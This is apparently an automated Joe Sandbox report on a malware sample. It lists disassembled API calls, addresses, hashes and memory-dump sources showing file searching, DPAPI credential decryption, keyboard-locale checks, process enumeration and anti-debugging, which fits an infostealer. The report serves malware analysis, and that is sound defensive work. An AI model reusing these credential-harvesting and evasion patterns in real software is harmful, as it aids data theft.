                                                        • Instruction ID: 1158901caeb41cc0561eedd1acea218bdfb89dc8425d96b5f9aae7b294716eac
                                                        • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                        • Instruction Fuzzy Hash: 60E10672911218ABDB18FB60DD91EEEB3B9AF55700F6051E9B04A62052EF305FC9CF52
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                        • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                        • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                        • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3334442632-0
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 00B2DD52
                                                        • StrCmpCA.SHLWAPI(?,004214B4), ref: 00B2DD9A
                                                        • StrCmpCA.SHLWAPI(?,004214B8), ref: 00B2DDB0
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2E033
                                                        • FindClose.KERNEL32(000000FF), ref: 00B2E045
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3334442632-0
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 00B2F985
                                                        • StrCmpCA.SHLWAPI(?,004215BC), ref: 00B2F9D6
                                                        • StrCmpCA.SHLWAPI(?,004215C0), ref: 00B2F9EC
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2FD18
                                                        • FindClose.KERNEL32(000000FF), ref: 00B2FD2A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 3334442632-0
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                                        • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                                        • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                        • String ID: \*.*$@
                                                        • API String ID: 433455689-2355794846
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 00B21B8A
                                                        • StrCmpCA.SHLWAPI(?,0042526C), ref: 00B21BDA
                                                        • StrCmpCA.SHLWAPI(?,00425314), ref: 00B21BF0
                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B21FA7
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00B22031
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B22087
                                                        • FindClose.KERNEL32(000000FF), ref: 00B22099
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 1415058207-0
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 00B2E0C5
                                                        • StrCmpCA.SHLWAPI(?,004214C8), ref: 00B2E115
                                                        • StrCmpCA.SHLWAPI(?,004214CC), ref: 00B2E12B
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2E647
                                                        • FindClose.KERNEL32(000000FF), ref: 00B2E659
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 2325840235-0
                                                        APIs
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                        • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                        • String ID: /
                                                        • API String ID: 3090951853-4001269591
                                                        APIs
                                                        • memset.MSVCRT ref: 0040C853
                                                        • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008267F8), ref: 0040C871
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                        • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                        • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                        • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                        • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                        • String ID:
                                                        • API String ID: 1498829745-0
                                                        APIs
                                                        • memset.MSVCRT ref: 00B2CABA
                                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B2CAD8
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B2CAE3
                                                        • memcpy.MSVCRT(?,?,?), ref: 00B2CB79
                                                        • lstrcat.KERNEL32(?,00420B46), ref: 00B2CBAA
                                                        • lstrcat.KERNEL32(?,00420B47), ref: 00B2CBBE
                                                        • lstrcat.KERNEL32(?,00420B4E), ref: 00B2CBDF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                        • String ID:
                                                        • API String ID: 1498829745-0
                                                        APIs
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                        • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                        • String ID: N@
                                                        • API String ID: 4291131564-4229412743
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00B37E48
                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00B37E60
                                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B37E74
                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B37EC9
                                                        • LocalFree.KERNEL32(00000000), ref: 00B37F89
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                        • String ID:
                                                        • API String ID: 3090951853-0
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                        • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                        • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID:
                                                        • API String ID: 2579439406-0
                                                        • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                        • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                        • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                        • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                        APIs
                                                        • IsDebuggerPresent.KERNEL32 ref: 00B3BE09
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B3BE1E
                                                        • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 00B3BE29
                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00B3BE45
                                                        • TerminateProcess.KERNEL32(00000000), ref: 00B3BE4C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                        • String ID:
                                                        • API String ID: 2579439406-0
                                                        • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                        • Instruction ID: 584a8685e8a3750ec6af3ba37e34e652b79d75b91f44fcd6230c22b8c0abfdc0
                                                        • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                        • Instruction Fuzzy Hash: 6921A3BC9002059FDB14DF69F889A963BE4FB0A315F50407AE90987265EBB05981EF49
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                        • String ID:
                                                        • API String ID: 3657800372-0
                                                        • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                                        • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B274B4
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B274BB
                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B274E8
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B2750B
                                                        • LocalFree.KERNEL32(?), ref: 00B27515
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                        • String ID:
                                                        • API String ID: 2609814428-0
                                                        • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction ID: 209d6596fd5358c6505e91bb7ddf907c5929fec50edcc8d3568e848e0573de5d
                                                        • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                        • Instruction Fuzzy Hash: A0011275B80208BFEB10DFD4DD45F9D77B9EB44704F104155F705AB2C0DA70AA008B65
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                                        • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                                        • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                                        • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                                        • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B39885
                                                        • Process32First.KERNEL32(00420ACA,00000128), ref: 00B39899
                                                        • Process32Next.KERNEL32(00420ACA,00000128), ref: 00B398AE
                                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00B398C3
                                                        • CloseHandle.KERNEL32(00420ACA), ref: 00B398E1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 420147892-0
                                                        • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction ID: 1ad1d9a271b374f13060621a3394ec28463fded74aeb28a8fdde89fbe3bf4d54
                                                        • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                                        • Instruction Fuzzy Hash: 45014C79A40208FFDB20DFE4CC94BEDB7F9EB49740F1041C9A505A6240D7749A44CF51
                                                        APIs
                                                          • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                          • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                          • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                          • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                          • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                          • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                          • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 00B2E709
                                                        • StrCmpCA.SHLWAPI(?,004214F8), ref: 00B2E759
                                                        • StrCmpCA.SHLWAPI(?,004214FC), ref: 00B2E76F
                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00B2EE46
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b20000_81C9.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                        • String ID:
                                                        • API String ID: 433455689-0
                                                        • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                        • Instruction ID: fd4b57cea001f9d26ad720aba9dca141c0dc311421696dda985266b3a6a11523
                                                        • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                                        • Instruction Fuzzy Hash: DB1211729102146BCB18FB60DD96EED73B9AF55700F7041EDB54A62091EE345F88CF52
                                                        APIs
                                                        • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2008261653.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                        • Associated: 00000002.00000002.2008261653.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
